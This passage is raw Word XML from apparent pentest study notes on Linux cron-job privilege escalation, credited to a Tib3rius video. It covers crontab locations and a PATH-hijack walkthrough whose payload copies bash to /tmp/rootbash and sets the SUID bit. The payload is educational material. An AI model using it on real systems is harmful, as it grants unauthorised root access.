      <w:bookmarkEnd w:id="316"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000239F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at cron jobs, either look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or look at the cron tabs output of LinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definitely manually enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/cron.d </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for custom cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y4w4k8qm2cw9" w:id="317"/>
      <w:bookmarkEnd w:id="317"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Jobs info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Cron Jobs Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Tabs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron table files (crontabs) store the configuration for cron jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User crontabs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are usually located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/spool/cron/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The system-wide crontab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is located at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab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3A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definitely manually enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/cron.d </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for custom cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m1n8dqqfbhr7" w:id="318"/>
      <w:bookmarkEnd w:id="318"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing PATH variable for unspecified absolute paths to executables ran by cron </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Cron Jobs Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron jobs may sometimes run an executable like "overwrite.sh".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5386388" cy="1070372"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="482" name="image214.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image214.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId754"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5386388" cy="1070372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT, they forgot to specify the absolute path to the executable. So we can find the PATH variable SPECIFIC to cron jobs, and then see if we can add our own malicious file with the same name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="479" name="image367.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image367.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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23B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Linux Smart Enumeration and we can see the PATH variable specific to /etc/crontab. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it says that we can write to some of the file paths in the cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the system-wide crontab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/ctrontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5386388" cy="1070372"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="216" name="image214.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image214.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId754"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5386388" cy="1070372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate the overwrite.sh file on the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">locate overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the PATH variable in /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/ctrontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find it, try adding a file with the same name to the first place PATH looks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="393" name="image367.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image367.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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23C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So here, it would be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the new file (copy /bin/bash but make it SUID):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /bin/bash /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make it executable</w:t>
      </w:r>
    </w:p>
